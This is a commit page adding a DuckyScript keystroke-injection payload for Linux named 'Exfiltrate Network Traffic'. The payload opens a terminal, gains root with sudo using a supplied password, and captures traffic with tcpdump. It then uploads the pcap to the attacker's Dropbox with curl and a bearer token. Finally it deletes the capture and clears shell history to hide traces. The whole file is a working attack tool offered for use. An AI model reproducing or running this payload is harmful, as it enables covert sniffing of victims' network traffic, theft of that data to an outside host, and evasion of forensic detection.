Create payload.txt
Aleff
GitHub
parent
944d8f7e2a
commit
85ea863505
|
|
@ -0,0 +1,119 @@
|
||||||
|
|
||||||
|
REM #############################################
|
||||||
|
REM # |
|
||||||
|
REM # Title : Exfiltrate Network Traffic |
|
||||||
|
REM # Author : Aleff |
|
||||||
|
REM # Version : 1.0 |
|
||||||
|
REM # Category : Exfiltration |
|
||||||
|
REM # Target : Linux |
|
||||||
|
REM # |
|
||||||
|
REM #############################################
|
||||||
|
|
||||||
|
REM Requirements:
|
||||||
|
REM - Permissions
|
||||||
|
REM - Internet Connection
|
||||||
|
|
||||||
|
REM REQUIRED: You need to know the sudo password and replace 'example' with this
|
||||||
|
DEFINE SUDO_PASS example
|
||||||
|
REM REQUIRED: Set what you want to sniff, for example tcp port 80
|
||||||
|
DEFINE SNIFFING example
|
||||||
|
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
|
||||||
|
DEFINE TOKEN example
|
||||||
|
REM Just a Dropbox const
|
||||||
|
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
||||||
|
REM Output file path packets.pcap, remember to use pcap extension
|
||||||
|
DEFINE FILE example.pcap
|
||||||
|
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
|
REM #### PERMISSIONS SECTION ####
|
||||||
|
|
||||||
|
|
||||||
|
STRING sudo su
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
STRING SUDO_PASS
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
|
||||||
|
|
||||||
|
REM #### Network Traffic SECTION ####
|
||||||
|
|
||||||
|
|
||||||
|
STRING FILE_PATH="
|
||||||
|
STRING FILE
|
||||||
|
STRING "
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
STRING filter_expression="
|
||||||
|
STRING SNIFFING
|
||||||
|
STRING "
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
REM Network card name
|
||||||
|
STRING net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
REM Network dump
|
||||||
|
STRING tcpdump -i "$net_card" $filter_expression -w "$FILE_PATH" &
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
REM Get PID
|
||||||
|
STRING tcpdump_pid=$!
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
REM Set how long you want to sniff
|
||||||
|
DELAY 60000
|
||||||
|
|
||||||
|
REM Kill the process by PID
|
||||||
|
STRING kill $tcpdump_pid
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
|
||||||
|
REM #### Exfiltrate SECTION ####
|
||||||
|
REM You can use whatever you want, i use Dropbox
|
||||||
|
|
||||||
|
STRING ACCESS_TOKEN="
|
||||||
|
STRING TOKEN
|
||||||
|
STRING "
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
STRING DROPBOX_FOLDER="/Exfiltration"
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
STRING curl -X POST
|
||||||
|
STRING DROPBOX_API_CONST
|
||||||
|
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
REM #### REMOVE TRACES ####
|
||||||
|
|
||||||
|
|
||||||
|
STRING rm "$FILE_PATH"
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
STRING history -c
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
REM Exit from Sudo user
|
||||||
|
STRING exit
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
REM Close the shell
|
||||||
|
STRING exit
|
||||||
|
ENTER
|
||||||
Loading…
Reference in New Issue